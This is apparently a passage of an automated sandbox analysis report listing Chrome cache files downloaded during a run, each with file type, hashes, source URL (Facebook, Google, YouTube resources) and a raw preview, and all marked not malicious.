                                                                                                                                                                                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000a71010000701e0000115200009853000053550000a37d000058c200008dc8000051cc000039d000005f410100....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".................................................................................%.<g.....Z9.S...&..<...C...]D.f......P.......Z./..:.~id..N..Q>S_'x...JW.Pj..mB.?h...Q....o..N....P.9..>..yy..\..uu@c.%/..`{...t..}.G0...g"b..o...|.o|..{.....H.}.|..e}?.6P.TFb.NP.]..^...~....&f.jg...........M.....E...O.>....^...J\.....h.....t3.z..P...15./&g.e....?I.q./..GB..}.....K..F_C...:[......._...|.c$..}S.s....|c..y.....s...0:.[....A.s.IG>......?....I..z2T...N.....P9...Um...e1n..../|..O..F...uw.}s{y..KIp....].,9.,.G.....Zi.L..=........._..!.6.n.G70...4...,.h..+.........fg..c...0e....Aw.....jc..B.w.k \..n.=...)\y..&....A.?.+'..y,.>..cz.[...W.....J...k9}..}...#...*.U4......w

                                                                                                                                                                                  Chrome Cache Entry: 900

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (10590)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):30454
                                                                                                                                                                                  Entropy (8bit):5.576137902379071
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:8/86aj6dY3cJpu4MN0As67qVOqIfhE8r8to8p85at48Wpe8KU8s7MiT8PtFvd:87aj5MJpu4MN0As6H5Gt4vuiTEZd
                                                                                                                                                                                  MD5:80EC39CA7A3BE13B675B5751FFBF45B0
                                                                                                                                                                                  SHA1:82161B242CFF2FBE988C3A838A057F083D524F40
                                                                                                                                                                                  SHA-256:C41583B8960E530A88B12C0780549D8C99A74B2CC5F983C686B6C585F699D98B
                                                                                                                                                                                  SHA-512:0382ED1DC9F412B176B514365C9AAFA1495D5FC692F07773F42C5F9E5EFCB7229ED16F14A48184C5850395D5037A3474D92C641020149F514767BB12F474D001
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iYu44/yU/l/en_US/nNbHix9dhZw.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("GroupsCometMemberProfileLink_group.graphql",[],(function(a,b,c,d,e,f){"use strict";a={argumentDefinitions:[],kind:"Fragment",metadata:null,name:"GroupsCometMemberProfileLink_group",selections:[{alias:null,args:null,kind:"ScalarField",name:"answer_agent_id",storageKey:null}],type:"Group",abstractKey:null};e.exports=a}),null);.__d("CometDisabledContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(!1);g["default"]=b}),98);.__d("BaseHScrollConstants",[],(function(a,b,c,d,e,f){"use strict";a=1600;b=10;f.MAX_CONTAINER_WIDTH=a;f.WIGGLE_ROOM=b}),66);.__d("smoothScrollTo",["ExecutionEnvironment","UserAgent"],(function(a,b,c,d,e,f,g){"use strict";var h,i=c("UserAgent").isBrowser("Firefox");b=(h||(h=c("ExecutionEnvironment"))).canUseDOM&&window.matchMedia("(prefers-reduced-motion: reduce)");var j=b&&b.matches,k=(h||(h=c("ExecutionEnvironment"))).canUseDOM&&document.documentElement!=null&&"scrollBehavior"in document.documentElemen

                                                                                                                                                                                  Chrome Cache Entry: 901

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):52
                                                                                                                                                                                  Entropy (8bit):4.542000661265563
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:yVkxzNDrMKcwVbF7KnZ:yVkxtkwVbF7KZ
                                                                                                                                                                                  MD5:B3B89B9C275343BC6798E3A83564FDDB
                                                                                                                                                                                  SHA1:32367475C527C3F5E5DB0BF42C348816FF4D157B
                                                                                                                                                                                  SHA-256:900FB968F7FD9EA55F600AC9002A89E56AB56597DA7BDE04DEAAE6CC77AEB276
                                                                                                                                                                                  SHA-512:ADB6938104E802B0936630B216CDE732F21ECA6E60E7A31D1B9C8FF52B5A66A712A7ECDE3F8ED4915D15C0A71C33A9788060E1E22999094C39020A1F8C636874
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto
                                                                                                                                                                                  Preview:CiUKDQ0ZARP6GgQIVhgCIAEKCw3oIX6GGgQISxgCCgcN05ioBxoA

                                                                                                                                                                                  Chrome Cache Entry: 902

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (4626)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):23279
                                                                                                                                                                                  Entropy (8bit):5.407857871342186
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:bBQaRLUCHqNBPWqYjqr70r2vZ7Jg8qlL2XikJyJpXZ:bzLUCKNBzYuX0r2hJJBYTXZ
                                                                                                                                                                                  MD5:7001296FE9C04A4056B6AEE2E4CA1977
                                                                                                                                                                                  SHA1:CCDCF52DC50A43D48452633F6E4D0B17B7C7F008
                                                                                                                                                                                  SHA-256:7A18C2C3022B0FFDCA24E076929CAF4F053FED4C1E8ED3DB08BBE0DAE1F11332
                                                                                                                                                                                  SHA-512:9B81E709540455174A90594B7509E0E529FD69B5E029E160EE824978EFA9243973E473578FED9CCF04F73952F98A5190BDA5C7DE7A7AD469DA4EB18333E67C57
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3ib3v4/yo/l/en_US/vwqID5lbHXG.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometInputWithCommands.react",["CometComponentWithKeyCommands.react","CometKeys","react"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||(h=d("react")),j=h.useMemo;function a(a){var b=j(function(){var b=[];a.enter!=null&&b.push({command:{key:c("CometKeys").ENTER},description:a.enter.description,handler:a.enter.handler,triggerFromInputs:!0});a["delete"]!=null&&b.push({command:{key:c("CometKeys").DELETE},description:a["delete"].description,handler:a["delete"].handler,triggerFromInputs:!0});a.up!=null&&b.push({command:{key:c("CometKeys").UP},description:a.up.description,handler:a.up.handler,triggerFromInputs:!0});a.down!=null&&b.push({command:{key:c("CometKeys").DOWN},description:a.down.description,handler:a.down.handler,triggerFromInputs:!0});a.tab!=null&&b.push({command:{key:c("CometKeys").TAB},description:a.tab.description,handler:a.tab.handler,triggerFromInputs:!0});a.esc!=null&&b.push({command:{key:c("CometKeys").ESCAPE},description:a.esc.description,handler

                                                                                                                                                                                  Chrome Cache Entry: 903

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 206x366, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):22854
                                                                                                                                                                                  Entropy (8bit):7.970852909542257
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:GmFHoGKNZqUF/YCu7QEY2UZ87r/3WiFVSt9egG9m4svR+ZUmwPJYlPtmpArklU:GmFIGKzqs/YCu7QEY2UQ/3Wpt9egGmZw
                                                                                                                                                                                  MD5:DDFA55C63AE0C44CA90EEEDCF31ED3D8
                                                                                                                                                                                  SHA1:8FCFB2A1DBF341E023B488BC99D0B3A90B497D5A
                                                                                                                                                                                  SHA-256:0484B79037E1397AB8FEF1045FAE57665A2B8938B6F628F01D256962A7002F51
                                                                                                                                                                                  SHA-512:FF48A313EA778A6CBA3FAED81F939FFFE54D6BAE422E868162DBE1CE920FE69965272E671BAC4CD86044FBA871F34CD3DBF1C2D2FE87EDC6E442D804F636CDFD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t15.5256-10/426298841_1492415047972648_5212976652358649185_n.jpg?stp=dst-jpg_p206x206&_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=kESdgojdjQwAX-vciDl&_nc_ht=scontent-lga3-2.xx&oh=00_AfCkLCLuaAN1hpkn2W_GhMGtY0uHotI_SBZYNbu_XTOF3A&oe=65DAB407
                                                                                                                                                                                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000a71010000bb06000001110000591300000c15000070220000fb34000013360000ba380000ad3a000046590000....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......n...."...............................................................................;..O;.....R...r.....X.%Z......o(:..4.T....f.GMA.Q2.O[.r.....j..Z..+/F..I,Z.X..:.....Q....s../....#|..IA..0.:2..(.....d...}k....i.Q......E..Wu`..L_L._6.t.(..e..~J1.N....@./|.L.d1QU1.P5.[`.K..7.{..&.3..1.~....16<....V>.}..@Ng..rf.j0[,.Y.....'.9JH..KE..t%c.....s..l........?.rY..b3.Q...t...c.e#Mm.7.:....y.;gF..8.p.y.Uu.e..-:....)L.X)..{.Q...p.....K.....@_w..c.T....w..r...RCd...E.L:shT:.AD...........A..O.....}........-.......?}u........U...J....Od..v.9"oi....u.....M....z/..#q....}R?.....=.e....<..u...u^..{....hC..H.......p.D....&.?....]8..t.o.....[....'V{.e..o .&.=grY.."._.j..4.g..

                                                                                                                                                                                  Chrome Cache Entry: 904

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):15552
                                                                                                                                                                                  Entropy (8bit):7.983966851275127
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzi:jslQ+LhUoTB0Qr6Qjkg/DmcJufzi
                                                                                                                                                                                  MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                                                                                                                                                  SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                                                                                                                                                  SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                                                                                                                                                  SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                                                  Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....

                                                                                                                                                                                  Chrome Cache Entry: 905

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                  Entropy (8bit):4.142295219190901
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:lZOwFQvn:lQw6n
                                                                                                                                                                                  MD5:1FA71744DB23D0F8DF9CCE6719DEFCB7
                                                                                                                                                                                  SHA1:E4BE9B7136697942A036F97CF26EBAF703AD2067
                                                                                                                                                                                  SHA-256:EED0DC1FDB5D97ED188AE16FD5E1024A5BB744AF47340346BE2146300A6C54B9
                                                                                                                                                                                  SHA-512:17FA262901B608368EB4B70910DA67E1F11B9CFB2C9DC81844F55BEE1DB3EC11F704D81AB20F2DDA973378F9C0DF56EAAD8111F34B92E4161A4D194BA902F82F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.doubleclick.net/instream/ad_status.js
                                                                                                                                                                                  Preview:window.google_ad_status = 1;.

                                                                                                                                                                                  Chrome Cache Entry: 906

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):15344
                                                                                                                                                                                  Entropy (8bit):7.984625225844861
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                                                                                                                                                                  MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                                                                                  SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                                                  SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                                                  SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                  Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..

                                                                                                                                                                                  Chrome Cache Entry: 907

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 206x366, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):15990
                                                                                                                                                                                  Entropy (8bit):7.9600028505387215
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:TomnjH1AAnoHLtnHMczhyGEVzTvLjMDkmTj8WgUCG+8J65:kmn7REtsD3V/84ocUCGJ65
                                                                                                                                                                                  MD5:143509F1E9D107D804A52DAD69764407
                                                                                                                                                                                  SHA1:C84E0408CC054FACD3D71085DAEFA0FAEF153A27
                                                                                                                                                                                  SHA-256:0C0617A9B1559EF0E9F6564347EA395A78BE49D57CD5BEB78D65D3721EC0F1E5
                                                                                                                                                                                  SHA-512:B0BB3F674668A74B019C41611F8575A7AEB8313DF81AC6137920A9EF4C03D5887A633EAF4508812E5F6D8F0F5CA58659FC68128037FA03D8B492E531EF5622F8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t51.29350-10/426723713_3627042410867961_5605923069429394965_n.jpg?stp=dst-jpg_p206x206&_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=Ku5YSyUzn8IAX9kwnc9&_nc_ht=scontent-lga3-2.xx&oh=00_AfDbb6L8NvhsgkcOBsJdBQPvAKBrey6S4uQ95zPCvCxe-Q&oe=65DAC2F3
                                                                                                                                                                                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000a71010000c1060000620f00005f110000fa120000c11900003c250000522600006a280000442a0000763e0000....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......n....".....................................................................................h........n...S3..(.Sr..n....o..f..\aF......T*...3.He..n_[....wtsp..p.ir{T.>"..e.aIk....x.i.2.SJ.g..z...]..3.,6.5mO"....T..OO.MD.....-.YX.$.ap......g.=f_.f.p..L8..^.....d..w....n......J.../g...e.9....Z...e.......I9..K..J...<.wq..>.7..v=.P.5........R.d..3.y#:..../p'/.wpr*.5..#A....u....%e..kQ..H....N..z.&_YN.AS......:...Q.a...W...Y.)U.C4..6~.....J....@.2....U...A..+....P.1f.....>..'..t2...&.Y...V...5..R%.Y...k.....j..=g....c.~.....N^47...:YtL.M.f...........z.V*.t.%k..Bg{V.|....A..K.....K.5.v..p....%.pF....2..L}'....L1.X.S...mA.)&.gu.vsC..^v..&@Tey.*B<..g.......q.H..,..:..>...

                                                                                                                                                                                  Chrome Cache Entry: 908

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):473
                                                                                                                                                                                  Entropy (8bit):5.240157994693449
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:kxeXjxeX4wFbcloiHKobO4xMl23ZhVgBDKDi7e8kbRNfeX60:kMYDRiqobPxi2fVgB+XprGJ
                                                                                                                                                                                  MD5:13782B3B1A5B6B82B186225398C96C55
                                                                                                                                                                                  SHA1:AA9E89FABF00C27173190096499F47FAEE56C684
                                                                                                                                                                                  SHA-256:1EAF3863ADA2FC1BC5C99F0731313B8046C576403EC8721757F935B8245C2C26
                                                                                                                                                                                  SHA-512:D966BA31E97827381C2F26E9DC069A6DA26EFFEE26AE9C1965A73C1CFB4A852A6F4C94BF60B1F33719A3AF522CA0B868D99833E422FDEAD8644BD527118AE685
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.QKwFb1UtQb4.es5.O/ck=boq-identity.AccountsSignInUi.NrxHlLi3bwM.L.B1.O/am=P2CJhmMBEJhZTvP3jJPDAAAAAAAAAAAAawA7/d=1/exm=A7fCU,AvtSve,Ctsu,EFQ78c,EGw7Od,EN3i8d,I6YDgd,IZ1fbc,IZT63,K0PMbc,KUM7Z,L1AAkb,LDQI,LEikZe,MpJwZc,NOeYWe,NTMZac,O6y8ed,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,Rusgnf,SCuOPb,STuCOe,SpsfSb,UPKV3d,UUJqVe,Uas9Hd,VwDzFe,W2YXuc,YHI3We,YTxL4,ZUKRxc,ZZ4WUe,ZwDk9d,_b,_tp,aW3pY,b3kMqb,bPkrc,bSspM,bTi8wc,bm51tf,byfTOb,eVCnO,fFzhe,fJpY1b,fqEYIb,hc6Ubd,hmHrle,iAskyc,inNHtf,kSPLL,lsjVmc,ltDFwf,lwddkf,mWLH9d,my67ye,n73qwf,njlZCf,oLggrd,pxq3x,q0xTif,qPfo0c,qmdT9,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,w9hDv,ws9Tlc,xBaz7b,xQtZb,yRXbo,ywOR5c,zbML3c,ziXSP,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlG2bCygi1DFAdwYKgmmvgAMIJrIdw/ee=ASJRFf:LANRae;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:BDnJmb;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:fqEYIb;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=XiNDcc"
                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.HIa=_.y("XiNDcc",[_.Nna]);._.k("XiNDcc");.var DI=function(a){_.J.call(this,a.Ha);this.aa=a.Ea.ez};_.B(DI,_.J);DI.Ba=function(){return{Ea:{ez:_.CI}}};DI.prototype.kB=function(){_.b3a(this.aa)};_.K(DI.prototype,"IYtByb",function(){return this.kB});_.M(_.HIa,DI);._.l();.}catch(e){_._DumpException(e)}.}).call(this,this.default_AccountsSignInUi);.// Google Inc..

                                                                                                                                                                                  Chrome Cache Entry: 909

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1738)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):2477
                                                                                                                                                                                  Entropy (8bit):5.4374502845572525
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:YzcIe4KH/M/TD6CUvU3vpfKYriTFQsC02Ec3b9:YQ9H/Gf73xnWTOecL9
                                                                                                                                                                                  MD5:B4948C7BFE2D4AEBD9EB3AEABC909110
                                                                                                                                                                                  SHA1:935F743DADD2E5AE5C65D0E8BB1092430AB5FA26
                                                                                                                                                                                  SHA-256:67F059105C4A6782057AB478BFF9135A681CD951FD6203DF096FA2A4E8663E9D
                                                                                                                                                                                  SHA-512:986B28DD77EE735F3BBAC57B45594053D0AEA8CE9E5CD6837DB5CE4446ADD9C768458D0F84FFAC5441A370FF16829490827175420589CE93AA5FC9BAEFC099D0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yd/r/_5vDGAzPQ3H.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("Qe2JsExposureFalcoEvent",["FalcoLoggerInternal","getFalcoLogPolicy_DO_NOT_USE"],(function(a,b,c,d,e,f,g){"use strict";a=c("getFalcoLogPolicy_DO_NOT_USE")("1837559");b=d("FalcoLoggerInternal").create("qe2_js_exposure",a);e=b;g["default"]=e}),98);.__d("QE2Logger",["Qe2JsExposureFalcoEvent"],(function(a,b,c,d,e,f,g){"use strict";var h={};function a(a,b){B(a,(a=b)!=null?a:"",9)}function b(a,b){B(a,(a=b)!=null?a:"",9,!0)}function d(a){B(a,"",4)}function e(a){B(a,"",32)}function f(a){B(a,"",32,!0)}function i(a){B(a,"",54)}function j(a,b){B(a,b,3)}function k(a){B(a,"",5)}function l(a){B(a,"",5,!0)}function m(a){B(a,"",31)}function n(a){B(a,"",98)}function o(a,b){B(a,b,7)}function p(a,b){B(a,b,55)}function q(a,b){B(a,b,17)}function r(a,b){B(a,b,25)}function s(a,b){B(a,b,8)}function t(a,b){B(a,b,22)}function u(a,b){B(a,b,27)}function v(a,b){B(a,b,0)}function w(a,b){B(a,(a=b)!=null?a:"",89)}function x(a,b){B(a,b,60)}function y(a,b){B(a,b,90)}function z(a,b,c){B(a,b,c)}fun

                                                                                                                                                                                  Chrome Cache Entry: 911

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1555
                                                                                                                                                                                  Entropy (8bit):7.107402048079722
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:T1hfvWwjx82lY2T3iV7vyJ3VzBYGsBq/qnmnTWApAvgBFBDd4WhjDFWyJZm:ZANn2esJ37Yf583eohTlJZm
                                                                                                                                                                                  MD5:12430F012C4B6B4A91C63CBF1369E1FF
                                                                                                                                                                                  SHA1:A8502ADE0C47E23230E5DA9D5658EC1F1DA309D6
                                                                                                                                                                                  SHA-256:079919E3400BA9BC0D569F5634CC41B2FD1B8E7A721B2B473D21F10FE2FA7F6B
                                                                                                                                                                                  SHA-512:17B7564088E12CD64AE79E7179EF4B26941370DC442528CB08320FC0D40BEC88D2B77124624685ACF9BA974467E27A7051703761C6FFFE5468C90217CAC5A4A6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/s/desktop/87423d78/img/favicon_32x32.png
                                                                                                                                                                                  Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)" xmpMM:InstanceID="xmp.iid:33B346918F4C11E7946BAB1AFF99627F" xmpMM:DocumentID="xmp.did:33B346928F4C11E7946BAB1AFF99627F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:13441FC48F4C11E7946BAB1AFF99627F" stRef:documentID="xmp.did:33B346908F4C11E7946BAB1AFF99627F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..6.....IDATx..MO.q.....X.B=./H..D...F...^8A........|....^...F...!..H...!.I.`Q.-.8........d.......<..'"....l

                                                                                                                                                                                  Chrome Cache Entry: 912

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (4919)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):771972
                                                                                                                                                                                  Entropy (8bit):5.5678723988865055
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:Jme85Yf5fEt77xSzVJXd44E8W6t7pI7hLPGMZQ+jVkta9HAMBelqm5g:iZSzV4e7WjVktnwX
                                                                                                                                                                                  MD5:A3AAB2FB2BDC5B7A3A78CE8EB66CECDD
                                                                                                                                                                                  SHA1:D36677CF7AC9F9FC72D279CF4EB9450F297205B2
                                                                                                                                                                                  SHA-256:C14D98CBEAF189F316FE5169FABAA456CFBBEB8568F8320AFAA89CFD62947AE2
                                                                                                                                                                                  SHA-512:2C2A3EE8EA8C49C40ED228DD532351B3579D83A8CE800C44DF4D26F06A2F9E43244E99BEE8E08E7797AA9A741F24850C558E12B0A47B48D2A0ACA6C11AA5435A
                                                                                                                                                                                  Malicious:false
